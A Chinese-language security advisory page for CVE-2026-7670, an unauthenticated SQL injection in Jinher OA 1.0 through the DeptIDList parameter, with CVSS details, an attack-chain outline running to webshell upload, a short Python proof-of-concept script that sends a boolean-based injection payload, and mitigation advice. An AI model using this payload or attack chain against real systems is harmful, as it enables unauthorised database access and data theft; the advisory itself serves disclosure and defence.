CVE-2026-7670 CVSS 7.3 高危

CVE-2026-7670 Jinher OA SQL注入漏洞

披露日期: 2026-05-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7670

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Jinher OA 1.0

漏洞概述

Jinher OA 1.0版本中的/C6/JHSoft.Web.PlanSummarize/UserSel.aspx文件存在SQL注入漏洞。由于系统对DeptIDList参数缺乏有效的安全过滤，未经身份验证的远程攻击者可利用该漏洞执行恶意SQL语句。攻击成功后可能导致敏感数据库信息泄露、数据被篡改或服务中断，对系统的机密性、完整性和可用性造成威胁。

技术细节

该漏洞源于Jinher OA 1.0在/C6/JHSoft.Web.PlanSummarize/UserSel.aspx接口处理用户输入时存在缺陷。后端代码直接将用户提交的DeptIDList参数拼接至SQL查询语句中，未进行任何转义或参数化查询处理。根据CVSS 3.1评分向量（AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L），该漏洞利用难度低，无需用户交互及身份认证即可通过网络发起攻击。攻击者可构造特定的SQL Payload（如布尔盲注、联合查询或时间盲注），欺骗数据库执行非授权命令，从而窃取后台数据或破坏数据库结构。

攻击链分析

STEP 1

侦察

攻击者使用网络扫描工具发现互联网上暴露的Jinher OA系统，识别出版本为1.0。

STEP 2

漏洞探测

攻击者向/C6/JHSoft.Web.PlanSummarize/UserSel.aspx发送包含特殊SQL字符的DeptIDList参数，观察服务器响应以确认SQL注入点。

STEP 3

构造攻击载荷

根据探测结果，攻击者构造Union Select或Boolean based SQL语句，旨在提取数据库表名、字段名或管理员密码哈希。

STEP 4

执行攻击

通过HTTP请求发送恶意Payload，数据库引擎解析并执行注入的SQL代码，返回敏感数据至攻击者。

STEP 5

权限提升与持久化

利用获取的数据库凭据（如管理员密码），攻击者尝试登录后台系统，进一步上传Webshell或植入后门。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
PoC for CVE-2026-7670 - Jinher OA SQL Injection
This script demonstrates checking the vulnerability via the DeptIDList parameter.
"""
import requests

def check_sqli(url):
    # Vulnerable parameter and endpoint
    target_endpoint = "/C6/JHSoft.Web.PlanSummarize/UserSel.aspx"
    full_url = url + target_endpoint
    
    # Testing payload for boolean-based SQL injection
    # Payload assumes '1' is a valid ID, tries to verify '1=1' logic
    payload = {
        "DeptIDList": "1' AND 1=1-- -"
    }
    
    try:
        response = requests.get(full_url, params=payload, timeout=10)
        print(f"Status Code: {response.status_code}")
        print(f"Response Length: {len(response.text)}")
        
        # In a real scenario, compare this with a '1=2' response
        if response.status_code == 200:
            print("[+] Potential SQL Injection vulnerability detected.")
        else:
            print("[-] Target did not respond as expected.")
            
    except requests.RequestException as e:
        print(f"Error connecting to target: {e}")

if __name__ == "__main__":
    target = "http://target-ip"  # Replace with actual target IP
    check_sqli(target)

影响范围

Jinher OA 1.0

防御指南

临时缓解措施

建议在网络边界设备（如防火墙、WAF）上封禁对外部访问/C6/JHSoft.Web.PlanSummarize/UserSel.aspx路径的请求，或针对DeptIDList参数添加严格的正则过滤规则。若业务允许，可临时下架该功能模块直至修复完成。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7670
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7670
3 Details https://www.cvedetails.com/cve/CVE-2026-7670/
4 VulDB https://vuldb.com/cve/CVE-2026-7670
5 Link https://github.com/zzlln/cvecve/issues/1
6 Link https://vuldb.com/submit/799506
7 Link https://vuldb.com/vuln/360818
8 Link https://vuldb.com/vuln/360818/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表